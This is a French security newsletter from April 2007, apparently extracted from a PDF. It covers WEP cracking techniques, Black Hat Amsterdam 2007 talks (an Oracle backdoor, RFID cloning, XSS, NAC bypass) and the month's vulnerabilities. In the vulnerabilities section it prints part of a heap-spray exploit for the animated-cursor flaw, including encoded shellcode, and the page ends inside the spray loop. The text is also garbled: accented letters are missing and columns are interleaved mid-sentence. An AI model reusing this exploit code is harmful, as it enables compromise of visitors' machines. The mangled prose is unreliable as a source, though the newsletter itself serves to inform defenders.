Vous êtes sur la page 1sur 21

LACTU SCU 13 DOSSIER SPECIAL BLACKHAT AMSTERDAM 2007

AVRIL 2
0 07

SOMMAIRE
LE PROTOCOLE WEP DFINITIVEMENT HAS BEEN
LES VULNRABILITS DU MOIS ( ANI, FAILLES DNS RPC, ORACLE...)
LES OUTILS LIBRES

XMCO Partners - 2007 [1]


Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est strictement interdite.
LEDITO AVRIL 2
0 07

Du terrorisme la cybercriminalit...
Nul nignore la monte du terrorisme pourraient mener lutilisation de pira- d'intrusion, et sur une forme de cyber-
en France ainsi quen Europe, et plus tes informatiques par des rseaux criminalit financire, dont l'enjeu
encore, en cette priode dlections... terroristes. principal serait le vol ou le dtourne-
ment de fonds. Les enjeux politiques
Le terrorisme s'appuie sur diffrentes Qu'en est-il de l'utilisation de la tl-
n'ont envahi la toile qu' travers des
composantes : l'idologie, le finance- phonie sur IP, des passeports RFID, forums ou des blogs, souvent parses
ment et la mise en oeuvre technique du Wifi dans les avions et des accs
et non structurs. Mais le risque d'une
des oprations qu'il estime "indispen- de tl-maintenance ?
instrumentalisation des technologies
sables" pour atteindre son but. Las-
Avec le chiffrement des flux et des subsiste et ne peut plus tre ignor.
sociation des idologues, des finan-
conversations, la surveillance des
ciers et des experts techniques sera Il est particulirement dlicat d'estimer
activits illicites devient de plus en
donc toujours ncessaire. ce genre de menaces, d'autant plus
plus difficile...
qu'elles ressemblent de la pure
Il se trouve que les terroristes demeu-
science fiction. Pour autant, il serait,
rent focaliss sur la destruction des
malgr tout, intressant de rflchir
vies humaines. Mais qu'en serait-il si
ce type de risques pour identifier les
ces derniers s'en prenaient aux tech- maillons faibles et ce afin de les ren-
nologies elles-mmes ? Est-il possible
forcer : que chaque banque s'assure
un jour de voir la menace voluer vers
qu'elle ne puisse pas hberger invo-
une sorte de guerre technologique ?
lontairement une plate-forme de blan-
Le lien entre le terrorisme et le hack- chiment d'argent qui servirait finan-
ing proccupe. Pour le prouver, lin- cer du terrorisme et quelle sassure
troduction de la confrence Black Hat que les infrastructures les plus criti-
2007 Amsterdam a t prsente ques soient surveilles sans relche...
Peut-on imaginer une attaque qui ne
par Roger Cumming du CPNI (Center
viserait que des infrastructures tech- Chacun de nous peut servir l'intrt
for the Protection of National Infra-
niques, mais qui aurait, cependant, commun, en respectant les rgles de
structure), lune des instances anti- base et en les enseignant ceux qui
terroristes anglaise. des consquences dramatiques ? Et
si un dni de service frappait une les ignorent encore...
Il y tait question de terrorisme, de grande place de march ? Quelles en
protection des infrastructures nationa- seraient les consquences ? Marc Behar
les et de la compartimentalisation
Jusqu' prsent, la scurit informati-
des comptences et des intrts qui
que s'est focalise sur les risques

AVRIL 2007
Nombre de bulletins Microsoft : 5
Nombre dexploits dangereux : 19
Nombre de bulletins XMCO : 131
WWW.XMCOPARTNERS.COM

Top 5 des virus


1. Netsky - 32,7%
2, Mytob - 30,4%
3, Sality - 7,8%
4, MyDoom - 5,2%
5.Baggle - 4,1%

Etat de lart....................................................................................3 Attaques et alertes majeures............................................11


Prsentation des faiblesses du WEP et des mthodes utilises par les pirates Description et analyse des attaques les plus importantes du mois.

Dossier Spcial Black Hat 2007 ..................................................7 Outils Libres.......................................................................14


Prsentation des sujets de la confrence Black Hat 2007 Dcouvrez les outils les plus efficaces.

XMCO Partners - 2007 [2]


Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est strictement interdite.
LE WEP, FAIBLESSES ET Le chiffrement WEP devient tota-
LACTU SCU Avril 2007
,
lement obsolte...

TECHNIQUES DATTAQUES La scurit des rseaux Wifi est


une problmatique cruciale qui in-

(PART.I)
tresse les pirates et les spcia-
listes en scurit.

En effet, la confidentialit des


donnes, l'accs non dlimit phy-
siquement et distant aux quipe-
ments, posent de vritables soucis.
Bien que la technologie Wifi reste
relativement rcente, les mesures
utilises pour protger les donnes
changes sont de plus en plus d-
cries, testes et remises en cause
par les pirates et les experts.

Le chiffrement WEP est un trs bon


exemple. Il est devenu compltement
obsolte avec la publication dun
nouvel outil et pourtant il demeure
utilis par les particuliers et
certaines entreprises.

Ce mois-ci, nous prsenterons les


faiblesses du protocole WEP ainsi
que les techniques dattaques uti-
lises par les pirates. La seconde
partie de cet article sera propose
le mois prochain. Elle illustrera
ce phnomne avec des exemples pr-
cis et un tutoriel complet sur
lutilisation de la suite Aircrack
sous Unix et sous Windows.

XMCO | Partners

Le fonctionnement du WEP 40 ou 104 bits), entre le point daccs et les diffrentes


Le WEP : Wireless Privacy Protocol (ou Weak machines du rseau auquel on concatne une chane ala-
Encryption Protocol...) toire de 24 bits appele: vecteur dinitialisation (IV).
Nous obtenons ainsi une chane de 64 ou 128 bits:
Le WEP est une norme IEEE 802.11 labore en 1999 dans
le but doffrir aux rseaux sans fils un moyen dauthentifica- Vecteur dinitialisation de
tion, de confidentialit et de contrle dintgrit. Clef secrte de 40 ou 104 bits
24 bits
WWW.XMCOPARTNERS.COM

La premire proprit du WEP est dassurer le chiffrement


des donnes lorsque ces dernires sont transmises par De manire simplifie, cette clef de 64 ou 128 bits va tre
ondes radio. Tous les paquets sont envoys au point dac- chiffre avec l'algorithme RC4 pour donner un flux nomm
cs de manire ce quun pirate ne puisse pas lire (en "keystream".
thorie) le contenu des informations transmises. Keystream
Vecteur
La plupart des internautes lutilise sans le savoir et surtout, dinitialisation de 24 Clef secrte de 40 ou 104 bits
RC4 10101010111101101010101010
bits
sans connatre son mode de fonctionnement, aujourdhui
remis en cause. Une simple opration XOR (OU exclusif) va ensuite tre
ralise entre le flux chiffr et les donnes envoyer (MC) ,
Le chiffrement des donnes auquelles un contrle d'intgrit (CRC32) aura t prala-
blement ajout (ICV(MC)).
Le WEP utilise lalgorithme de chiffrement RC4 avec des La formule mathmatique est donc:
clefs d'une longueur de 64 ou 128 bits. Ces dernires se
composent dun secret partag, que nous nommerons K (de PC = RC4(IV || K) XOR (MC |I CV(MC))

XMCO Partners - 2007 [3]


Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est strictement interdite.
LACTU SCU Avril 2007 Obtient donc :
PC=Paquet Chiffr
IV: Vecteur dInitialisation
RC4(IV || K) = PC XOR (MC |I CV(MC))
MC: Message en Clair
ICV(M): Contrle dintgrit du message M

Les donnes chiffres seront, ensuite, envoyes avec le Lattaquant peut donc rutiliser ce keystream (sans con-
vecteur d'initialisation en clair. natre la clef secrte) et sen servir pour sauthentifier au-
prs de lAP en chiffrant le nouveau challenge.

1. Envoi dun challenge en clair (MC)


2. Rponse Chiffre (PC)
3. Envoi d un challenge en clair par le point daccs
Ainsi la machine destinataire va utiliser ce vecteur avec la 4. Rponse possible du pirate au challenge en utilisant un
clef qu'il possde pour effectuer l'opration inverse : le d- keystream prcdemment rcupr.
chiffrement.
La scurit du WEP repose donc sur un mot de passe Il pourra galement chiffrer des requtes avec ce paramtre
secret partag entre les machines qui vont communiquer et injecter ainsi des donnes sur le rseau. Il sera aussi
et une chane (vecteur dinitialisation) gnre alatoire- mme de dchiffrer des paquets qui utilisent ce mme keys-
ment lors du chiffrement des donnes. tream.

Lauthentification nest donc pas scurise. En effet, elle


Les vulnrabilits du WEP introduit une faille qui permettra de casser la clef et de nuire
la confidentialit des changes. Les diteurs ont donc
Plusieurs problmes de scurit ont t introduits par lutili- rapidement introduit le filtrage par adresse MAC ou la dis-
sation de ce protocole notamment en ce qui concerne lau- simulation du SSID qui restent des techniques faciles con-
thentification, la confidentialit et lintgrit des donnes. tourner.

Authentification
Le point daccs identifie la machine qui souhaite se con- WWW.XMCOPARTNERS.COM
necter en lui envoyant un challenge en clair qui devra tre
renvoy chiffr. Un pirate qui coute cette communication,
obtient donc le message en clair (MC) et son quivalent
chiffr.
Dun point de vue mathmatique, il est possible de cerner
une premire aberration. Lopration XOR est rversible.
Lopration A = B XOR C est quivalente B = A XOR C. Le
pirate peut donc obtenir le keystream utilis pour chiffrer
le message:

PC = RC4(IV || K) XOR (MC || CV(MC))

Connus

XMCO Partners - 2007 [4]


Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est strictement interdite.
LACTU SCU Avril 2007 Confidentialit et intgrit bles. La premire suite doutil Aircrack est alors publie
sur Internet et permettait dj datteindre des temps records
Dautre part, pour utiliser correctement le chiffrement RC4, (10 minutes pour une clef de 128 bits en laboratoire). Des
il est indispensable de suivre ces trois principes: tudes statistiques volues permettaient au logiciel de
casser une clef rapidement.
Ne jamais utiliser une mme clef deux fois de suite pour
chiffrer les donnes changes. En 2005, Andreas Klein, chercheur au sein du laboratoire de
Cryptographie et dAlgbre Informatique luniversit
Ne pas utiliser les 512 premiers octets de la sortie RC4 Darmstadt en Allemagne, a prsent une autre analyse du
pour viter les problmes lis l'utilisation de clefs faibles. flux RC4. De nombreuses corrlations entre
les paquets chiffrs et la clef sont
Ne pas chiffrer plus de 2^36 octets de donnes avec la identifies. Des tudes statistiques
mme clef. montraient alors quen rcuprant
quarante mille paquets, la clef pouvait
Or sur un rseau o le trafic est lev, seul le vecteur dini- tre retrouve avec 50% de chances.
tialisation alatoire de 24 bits permet dviter la rptition de
clefs. Une collision de clefs est donc possible 99% avec Enfin, en avril dernier, trois chercheurs de la
seulement lenvoi de 12000 trames. La premire rgle nest mme universit ont optimis les recherches de M.Klein. Ils
donc absolument pas prise en compte. ont dvelopp un outil et ont russi casser une clef en
moins dune minute (voir encadr). Avec quelques dizaines
Dans le cas o un message est chiffr avec la mme keys- de milliers de paquets, la clef peut, dsormais, tre cracke
tream RC4, on obtient: avec une probabilit leve.

INFO...
PC = RC4(IV || K) XOR (MC || CV(MC))
PC = RC4(IV || K) XOR (MC |I CV(MC))

PC XOR PC = (MC || CV(MC)) XOR (MC |I CV(MC))


Une clef WEP casse en 1 minutes

Toutes ces erreurs dimplmentation sont intgres dans le Le 1er avril dernier, des chercheurs de luniversit de
le protocole WEP. Elles deviendront la base de lattaque en Darmstadt ont dvelopp un outil aircrack-ptw qui a
question... atteint des performances ingales.
Ils sont parvenus casser une clef en moins dune minute
Enfin, le CRC32 utilis nest pas un contrle dintgrit effi- en utilisant des techniques dinjections de paquets.
cace car il peut facilement tre contourn.
Seuls 40 000 paquets sont aujourdhui suffisants pour
casser une clef WEP avec 50% de chances. Cette probabi-
Les diffrentes attaques contre le protocole WEP lit slve 95% pour 85 000 paquets.
Cependant, certains contestent ces chiffres. En effet, ces
Evolution des recherches temps records ont t obtenus dans un environnement de
tests.
Plusieurs styles dattaques ont t proposs. Ces derniers
ont volu pour aboutir au succs prsent dans lencadr. La nouvelle a rapidement fait le tour du monde...Le WEP
devient dfinitivement obsolte...
Les premires recherches ont t menes en avril 2001 par
Scott Fluhrer, Itsik Mantin et Adi Shamir. Ces experts ont
publi une analyse cryptographique qui dvoilait les faibles-
Prrequis
ses du flux gnr par lalgorithme RC4 notamment avec le WWW.XMCOPARTNERS.COM
WEP. En effet, leur tude prouvait que pour certaines va-
Le cassage de clefs WEP requiert une configuration
leurs de la clef, les premiers bits du keystream dpendaient
prcise des cartes rseaux utilises. En effet, le pirate va
uniquement des quelques bits de la clef. Certaines valeurs
devoir capturer des paquets chiffrs en coutant certains
de cet IV gnraient alors des clefs dtes faibles.
canaux utiliss par les machines qui mettent des donnes.
La carte Wifi doit donc tre en mode monitor ce qui n-
Peu de temps aprs, des dmonstrations ont prouv que
cessite dinstaller des pilotes particuliers.
ces faiblesses pouvaient tre exploites en capturant de 4
Sous Windows seules quelques cartes Wifi peuvent tre
6 millions de paquets.
configures de la sorte.
En revanche, de nombreux pilotes libres ont t publis
Quatre ans plus tard, un hacker nomm KoReK a amlior
pour les cartes utilises sous Linux.
cette attaque. Cinq cent mille 2 millions de paquets taient
dsormais ncessaires pour casser la fameuse clef WEP.
Une fois la bonne carte Wifi correctement configure, il suffit
Un premier outil, nomm ChopChop, tait n
dutiliser la suite Aircrack compose de trois logiciels.
Dans le mme temps, un ingnieur franais, Christophe
Toutes les conditions sont alors runies pour couter, re-
Devine, a dvelopp loutil le plus utilis aujourdhui. Des
jouer des paquets et casser une clef.
paquets sont rinjects ce qui permet de diminuer sensi-
blement le temps ncessaire la rcupration des IV fai-

XMCO Partners - 2007 [5]


Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est strictement interdite.
LACTU SCU Avril 2007 Lcoute passive et la rcupration des IV fai- tres ASCII. En
bles adoptant une clef
suffisamment lon-
La premire partie de lattaque consiste rcuprer un gue,
grand nombre de paquets chiffrs. Sur un rseau passif, les toutes les attaques
donnes changes ne sont pas forcment nombreuses. Le de cassage de clef
pirate a deux possibilits: attendre ou stimuler le rseau par force brute
grce plusieurs techniques. sont inutiles.
La premire est nomme rejeux de paquets. Elle con-
siste rcuprer certains paquets identifiables (requtes Pour lever le ni-
ARP) qui vont ensuite tre r-injects dans le but de forcer veau de scurit
le point daccs gnrer des rponses contenant des dans les entrepri-
donnes intressantes. Les donnes ARP prsentent des ses, il serait judi-
tailles fixes et possdent des enttes connues. cieux d'abandon-
La deuxime souvent utilise est la fausse authentifica- ner la protection
tion qui consiste simuler une authentification de manire par clef partage
gnrer des donnes toujours utiles pour acclrer les au profit d une
changes de donnes sur le rseau. a u t h e n t i fi c a t i o n
forte.
Le support de la
norme 802.1x est l'une des amliorations apportes par le
WPA.

Par ailleurs, l'implmentation de la norme 802.11i, gale-


Cassage de la clef ment appele WPA2, n'est pas sans consquence. En effet,
la norme repose sur l'utilisation de l'algorithme de chiffre-
Loutil Aircrack intervient dans cette dernire tape. Bas ment AES. Ce dernier implique une puce ddie et une ali-
sur diffrentes attaques statistiques, le logiciel utilise des mentation lectrique accrue. Les quipements anciens ne
trames contenant des IV faibles rcuprs prcdemment. sont donc pas compatibles et/ou ne possdent pas les res-
Des votes sont ainsi attribus chacun des octets proba- sources suffisantes pour utiliser le protocole AES, gros con-
bles et la clef est dduite des probabilits mises. sommateur de ressources.

Que ce soit du WPA ou du WPA2, nous recommandons aux


O en sommes-nous dans la scurit des rseaux sans-fils ? particuliers d'utiliser une passphrase d'une vingtaine de
caractres. En effet, celle-ci ne doit tre renseigne quune
Des statistiques toujours aussi surprenantes seule fois sur le point d'accs et sur les ordinateurs. Pour
les entreprises, l'implmentation d'une authentification forte
La prise de conscience des particuliers et des entreprises est particulirement recommande.
des diffrents dangers font quils scurisent leurs rseaux D' une part, les petites structures choisiront dimplmenter le
sans fil. Cependant, les chiffres restent surprenants. Une protocole "EAP-TLS" qui repose sur une PKI avec un ser-
rcente tude a rvle que 70% des rseaux sans fil dans veur RADIUS. Cette mthode ncessite la prsence d'un
le monde n'utilisaient aucun mcanisme de chiffrement. certificat sur chaque machine.
D'autre part, les grandes groupes prfreront les protocoles
A Paris, le constat est moins alarmant. Seulement 37% des "EAP-TTLS" ou "PEAP" grce auxquels les utilisateurs peu-
rseaux ne sont pas protgs. Notre capitale savre tre vent s'authentifier laide des couples login/password.
lune des villes les mieux scurise au monde, contraire-
ment Pkin ou Moscou o les statistiques sinversent. Conclusion

Le protocole WEP tait bless depuis quelques annes


Les meilleures pratiques et les futures impl- mais les dernires recherches lont dfinitivement enterr.
mentations Des erreurs dimplmentation font que la plupart des accs
sans fil ne sont pas scuriss et laissent aux pirates un ac-
Aujourdhui des solutions simples existent. En effet, bon cs potentiel au rseau local...
nombre de fournisseurs daccs prfrent encore garder le Le mois prochain, nous vous proposerons des exemples de
WEP. Ils proposent certes des mthodes de rotations de cassage de clefs WEP. Le fait que les attaques puissent
plusieurs clefs, ce qui ne constitue pas la bonne solution. tre menes par des jeunes inexpriments, devrait forcer
Dautres voluent voluent et intgrent le protocole WPA- les entreprises et les particuliers scuriser davantage
PSK (Pre Shared Key). Ce dernier utilise un vecteur dinitia- leurs accs sans fil.
lisation plus grand que le WEP ce qui empche les types
dattaques que nous venons de vous prsenter. Bibliographie

Il est conseill de migrer rapidement les rseaux Wifi prot- [1] Dfinition du WEP
gs par WEP en WPA. Cette migration peut tre faite sans http://fr.wikipedia.org/wiki/Wired_Equivlent-Privacy
surcot en choisissant le WPA-PSK.
Cette solution repose, comme le WEP, sur le partage d'une
[2] Site officiel des auteurs de loutil aircrack-ptw
clef secrte. En WPA la clef est compose de 8 63 carac-
http://www.cdc.informatik.tu-darmstadt.de/aircrack-ptw/

XMCO Partners - 2007 [6]


Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est strictement interdite.
DOSSIER SPECIAL : BLACK HAT
LACTU SCU Avril 2007
Black Hat 2007 Amster-
dam

La grande confrence de tous


les spcialistes en scurit
sest droule la fin du
mois de Mars Amsterdam.

Deux fois par an, les pira-


tes, RSSI, et experts en s-
curit se rencontrent afin
dchanger leurs expriences
et de prsenter les dernires
vulnrabilits dcouvertes.

Petit aperu en exclusivit


des prsentations les plus
marquantes et qui auront,
sans aucun doute secou
quelques diteurs

XMCO | Partners

Comme son habitude la Black Hat, confrence tant atten- identifier des failles potentielles au sein des pilotes Wifi.
due par les spcialistes du milieu, a propos de nombreu-
ses prsentations et de nombreuses dmonstrations dans Le fuzzing est une technique qui consiste envoyer un
des domaines varis : rseaux, bases de donnes, postes grand nombre de donnes malformes ou alatoires avec
clients, technologies sans fil... Chacun des participants pou- des outils automatiss. Ceci permet didentifier les erreurs
vait y trouver son compte. Petit tour dhorizon... de traitements sur la machine ou sur lquipement cibl.

Les technologies sans fils Dans le cas du Wifi, des expriences ont donc t menes,
Wi-fi Advanced Fuzzing en envoyant des rponses malicieuses aux requtes PRO-
BES (envoyes par les machines dans le but de dtecter
Comme nous vous lavons prsent dans larticle prcdent, des points daccs).
linscurit du WEP nest plus dmontrer. Les cher-
cheurs sactivent aujourdhui pour trouver dautres er-
reurs dimplmentation et dautres failles de scurit
relatives aux quipements Wifi qui pullulent. Les
smartphones, les tlphones mobiles et les consoles
WWW.XMCOPARTNERS.COM
de jeux sont les nouvelles cibles. Le business des pira-
tes dans ce domaine est donc loin dtre puis.

Jusqu prsent les recherches des experts se basaient


sur laudit des codes sources mis disposition (pilotes
libres), sur du reverse engineering (analyse) ou en audi-
tant les quipements cibls sans avoir connaissance de
leurs modes de fonctionnement (Blackbox).

Aprs les rcentes vulnrabilits des pilotes Wifi pour


Mac OS (dernire Black Hat) et les diffrentes failles de
Ds quune erreur se produit, il suffit de vrifier si des re-
scurit des drivers de plusieurs diteurs (D-Link, Netgear),
qutes Probes sont toujours mises, couter sur un lien
Laurent Butti, expert R&D chez France Telecom a prsent
Ethernet les rponses au requtes PING ou observer les
ses rcentes recherches sur un procd peu utilis dans le
ractions de laffichage des OS (cran bleu pour Windows).
milieu des rseaux sans fil : le fuzzing utilis pour

XMCO Partners - 2007 [7]


Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est strictement interdite.
LACTU SCU Avril 2007 Les trouvailles de ce chercheur ont t rvles au grand Les bases de donnes et les progiciels de gestion
public. En envoyant des SSID excessivement longs, des Hacking Databases for owning your data
informations sur le dbit (rate) malforms ou des param-
tres TIM contrefaits, diffrents pilotes Wifi Netgear ou D-Link Le second sujet phare de la Black Hat aura t le
se sont avrs vulnrables. Mme remarque pour le pilote hacking des bases de donnes et des systmes ERP.
MadWifi, utilis afin de casser les clefs WEP (voir notre arti- La premire trouvaille dans le domaine des bases de
cle prcdent) vulnrable un dbordement de tampon (les donnes a t prsente par des consultants de la
hackers sont pris dans leurs propres piges!).
socit Argeniss (Cesar Cerrudo et Esteban Martinez
Fayo) qui ont dvelopp une backdoor et un rootkit
RFIDIOts - RFID hacking without a soldering pour les bases de donnes Oracle.
Iron

Aprs les quipements rseaux Wifi, les dmonstra-


tions ont galement cibl la technologie RFID. Celle-ci
est de plus en plus utilise dans la vie quotidienne
(identification des animaux, gestion des stocks et des
bagages, vente, implants sur des humains, passe-
ports). Le RFID, dj critiqu lanne dernire (voir
article dans Actu-Scu n6 - Septembre 2006), a , une
fois de plus t prsent comme un vecteur dattaque
dangereux.

La dmonstration sest base sur un outil tlcharg


sur Internet ainsi que sur un lecteur standard. Adam
Laurie a pu cloner une puce RFID en utilisant une A laide du langage de scripts PL/SQL, les experts ont
technique de dcodage des Tags qui permet de copier dmontr quil tait possible de mettre en place un
le fameux paramtre ID. Lexpert affirme avoir tudi moyen de communication entre une base de donnes
uniquement les modes demploi des diteurs. Il peut et un pirate en crant un processus cach qui utilise
dsormais sniffer les numros didentification en les jobs planifis dOracle.
passant quelques mtres dune personne utilisant, Le script malicieux installe le logiciel espion qui ouvre
par exemple, un badge daccs RFID. une connexion vers la console laide de la fonction
UTL_TCP.OPEN_CONNECTION. Il reoit, excute
Les lecteurs et les graveurs sont maintenant disponi- les commandes reues et renvoie les sorties des re-
bles moindre cots sur les sites spcialiss. Cela qutes. Ce dernier peut galement tre dissimul
accrot considrablement le risque de malversations avec un rootkit. La backdoor peut tre planifie afin
et dvolutions dans ce domaine de plus en plus tu- dtre lance priodiquement. Cela permet de rcup-
di par les cybercriminels (notamment pour la copie rer une connexion perdue (seul lagent sur la base de
de passeports). donnes permet dinitier une connexion reverse).
Cet outil performant contourne les pare-feux qui ne
Par la suite, lexpert a publi les codes sources de ses filtrent pas le trafic sortant.
scripts bass sur la librairie Python RFIDIOT. Le ma-
triel et les pr-requis sont disponibles sur le site cit
en rfrence.

WWW.XMCOPARTNERS.COM

La dmonstration a t couronne de succs. Malgr


quelques soucis techniques, la backdoor a t facile-
ment installe sur une base de donnes en exploitant
pralablement une faille dinjection SQL. Le pro-
gramme malicieux se connecte ensuite sur la console

XMCO Partners - 2007 [8]


Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est strictement interdite.
LACTU SCU Avril 2007 du pirate et peut alors rcuprer lintgralit de la mandes et daccder en lecture/criture la base de
base de donnes. donnes vulnrable.

INFO...
Attacking the Giants : exploiting SAP internals

Aprs les bases de donnes, le progiciel SAP a ga-


lement subit les foudres de Mariano Nunez Di Croce
Les bases de donnes, de vrais mines dor de la socit CYBSEC. Des erreurs grossires de
pour les pirates... scurit notamment au sein du protocole RFC (Re-
Les pirates sintressent de plus en mote Function Call) ont t dvoiles.
plus aux bases de donnes pour revendre
sur le march noir des informations sen- Lenvoi de mots de passe simplement offusqus
sibles. Des sites officiels rvlent les laide dune simple opration XOR ou lutilisation illgi-
prix moyens constats : time de la fonction RFC_REMOTE_EXEC (qui permet
dexcuter des commandes distance) permettrait
des pirates prpars de mener des attaques de type
Man in the middle en crant des serveurs SAP
malicieux.

Les postes clients


Nac@ack

Une autre prsentation a t


Des outils sont mme disponibles et mene par le duo Michael
permettent de calculer la somme poten- Thumann et Dror-John
tielle quun pirate pourrait obtenir. Rcher sur le contournement de la technologie NAC
(Network Access Control). Le protg de Cisco per-
met de contrler tout ordinateur avant de laccepter
sur le rseau en vrifiant sa conformit avec une poli-
tique de scurit prcdemment dfinie (antivirus,
niveau de correctifs, tat du pare-feu personnel, outils
non dsirs). Laccs au rseau est alors refus
un client non-conforme ou bien, ce dernier est tempo-
rairement mis en quarantaine sur un vlan ddi.



Swipetoolkit
WWW.XMCOPARTNERS.COM

Advanced Exploitation of Oracle PL/SQL


Un agent (Cisco Trust Agent) est install sur le poste
client et communiquera avec les quipements du r-
Toujours dans le domaine des bases de donnes, la
seau ainsi quavec un serveur.
socit NGS Software, renomme dans ce domaine,
a prsent des failles de scurit au sein des proc-
Les deux consultants allemands ont prouv quun
dures stockes dOracle (PL/SQL). Pour simplifier les
poste non lgitime pouvait tout de mme accder au
explications, les procdures PL/SQL sexcutent avec
rseau. Deux erreurs dimplmentation permettent de
des droits levs, en utilisant des paramtres errons.
forcer lagent Cisco envoyer des informations falsi-
Un pirate est donc en mesure de provoquer larrt
fies au serveur responsable de la validation.
inopin de la procdure.
Cisco na pas communiqu sur ce sujet et corrigera ce
Un curseur courant reste ouvert. Il peut donc tre r-
problme dans les mois venir.
utilis par le pirate dans le but dexcuter des com-

XMCO Partners - 2007 [9]


Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est strictement interdite.
LACTU SCU Avril 2007
Kicking Down the Cross Domain Door (One
XSS at a time)
A lheure o les failles applicatives (Cross Site
Scripting et CSRF) constitue les portes des vuln-
rabilits les plus exploites (on dnombre plus de
3 sites sur 5 vulnrables ce type dattaque), Billy
K Rios et Raghav Dube ont prsent un outil
nomm XS-Sniper, un proxy qui permet de mener
des attaques volues.

Le principe est simple. Le pirate identifie un para-


mtre non valid au sein dune application web,
qui lui permet dinjecter un code Javascript excu-
t ultrieurement par le navigateur de la victime
(dfinition dune faille XSS).

Le script malicieux autorise la communication bidirec- Enfin, les autres prsentations se sont, entre autres,
tionnelle avec le pirate. Ce dernier permettra den- intresses la fuite dinformations du protocole
voyer des informations au pirate et facilitera ainsi SMTP, au piratage de Vista et aux attaques applicati-
lexploitation de la vulnrabilit. ves les plus utilises...comme un air de dj vu!

La dmonstration prsente un exemple dattaque me-


ne partir dun blog. Ces sites permettent aux utili- Conclusion
sateurs dinsrer du code HTML et, par la mme oc-
casion, dinjecter ou de faire rfrence un code Ja- Contrairement aux prcdentes Black Hat, les prsen-
vascript malicieux. Une frame est alors gnre par tations se sont moins axes sur les problmes des
ce script et servira de relais entre le pirate et le site end user mais davantage sur des lments criti-
externe cibl. Les deux spcialistes ont donc combin ques du systme dinformations comme les bases de
une attaque XSS et une vulnrabilit CSRF (voir notre donnes ou encore les progiciels contenant des don-
article du mois de janvier 2007) afin denvoyer silen- nes critiques.
cieusement et l'insu de la victime des requtes vers Les menaces viennent effectivement du rseau in-
un site bancaire. terne.

Rfrence :
New Botnets Trends and Threats
Aprs les vulnrabilits applicatives et les systmes, [1] Site officiel de Black Hat
dautres chercheurs se sont intresss un phno- http://www.blackhat.com
mne grandissant les botnets ou les rseaux de
robots en franais. [2] Informations sur la librairie Python Rfidiots
Les botnets sont des rseaux de machines compro- http://www.rfidiot.org/
mises qui permettent des pirates de mener des at-
taques grande chelle en envoyant des commandes
spcifiques. Le pirate communique avec ses machi-
nes zombies, le plus souvent laide de canaux IRC.
Cependant, dautres vecteurs sont de plus en plus
utiliss.
Jose Nazario a centr son tude sur les outils, les
techniques et les nouvelles mthodes de contrle
distance prfrs des cybercriminels. Ainsi de nou-
veaux procds de communication sont clairement
identifiables : protocoles SMB et SIP, diffusion de
messages instantans, sites communautaires comme
Myspace ou encore utilisation du logiciel Skype.
La dmonstration sest dailleurs base sur ce logiciel
qui est le leader du march de la VoIP.
Les commandes sont ainsi noyes parmi des flux de
donnes lgitimes qui les rendent indcelables.

XMCO Partners - 2007 [10]


Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est strictement interdite.
LACTU SCU Avril 2007

LES ATTAQUES MAJEURES


Tendance de lactivit mali-
cieuse dInternet :

Aprs un mois de Mars rela-


tivement calme, en particu-
lier pour les correctif
Microsoft (aucun publi),
des vulnrabilits 0-day
ont t dcouvertes.

L'vnement majeur du mois


correspond sans aucun
doute aux deux vulnrabili-
ts Microsoft "ani" et
"DNS" qui ont rveill les
responsables scurit aprs
un mois de Mars relative-
ment calme (aucune vulnra-
bilit Microsoft).

Explications

XMCO | Partners

Microsoft serein en mars mais actif en avril

CODE ...
Vulnrabilit des curseurs anims (MS-07-
017) [1]

La premire faille de scurit a cibl linterface gra- <html>


<body>
phique de Windows GDI (Gaphical Device Interface) <SCRIPT language="javascript">
et le traitement des curseurs anims "ani" mal-forms. var heapSprayToAddress = 0x07000000;

En effet, cette vulnra- var payLoadCode =


bilit a t largement unescape("%uE8FC%u0044%u0000%u458B%u8B
3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120
exploite et reste un %u49EB%u348B%u018B%u31EE%u99C0%u84AC%u
des vecteurs d'attaques 74C0%uC107%u0DCA%uC201%uF4EB%u543B%u04
les plus dangereux. La 24%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B
victime doit simplement %u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%u
visiter un site malicieux C304%uC031%u8B64%u3040%uC085%u0C78%u40
8B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B
ou visualiser un e-mail
WWW.XMCOPARTNERS.COM
%u00B0%u0000%u688B%u5F3C%uF631%u5660%u
contenant le fichier contrefait. F889%uC083%u507B%u7E68%uE2D8%u6873%uFE
98%u0E8A%uFF57%u63E7%u6C61%u0063");
Le traitement de ce curseur anim provoque un d-
bordement de tampon qui laisse la possibilit au pi-
rate dinjecter des donnes malicieuses. Aprs la pu-
blication d'une premire preuve de concept, plusieurs
versions d'exploits ont envahi les forums et les sites
ShellCode permettant de lancer le
spcialiss. Nous vous prsentons, ici, un exemple de
programme calc.exe
page web qui dclenche l'excution du programme
"calc.exe". Suite...

XMCO Partners - 2007 [11]


Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est strictement interdite.
LACTU SCU Avril 2007 Le virus W32/Delbot-AI ft le premier se diffuser

CODE SUITE...
sur la toile. Une fois le serveur infect, le ver commu-
nique via un canal IRC avec ses auteurs afin den-
voyer les informations voles et de recevoir des
commandes excuter.

var heapBlockSize = 0x400000; En attendant la sortie du correctif, le deuxime mardi


var payLoadSize = payLoadCode.length *
du mois de Mai, nous vous conseillons de ne pas ex-
2;
var spraySlideSize = heapBlockSize - poser les ports RPC sur un serveur DNS accessible
(payLoadSize+0x38); depuis Internet.
var spraySlide = u n e s c a-
pe("%u9090%u9090");
spraySlide = getSpraySlide(spraySli-
de,spraySlideSize); Rseau et VoIP
heapBlocks = (heapSprayToAddress Cisco corrige plusieurs de ses produits
- 0x400000)/heapBlockSize;
De nombreux produits Cisco ont t corrigs. Diff-
memory = new Array();
rentes vulnrabilits de dni de service ou de vol din-
for (i=0;i<heapBlocks;i++) formations ont t dcouvertes.
{ Le premier problme affectait les tlphones Cisco
memory[i] = spraySlide + payLoad- Phone 7940/7960. Lenvoi de donnes SIP malfor-
Code; mes provoquait un redmarrage des quipement
}
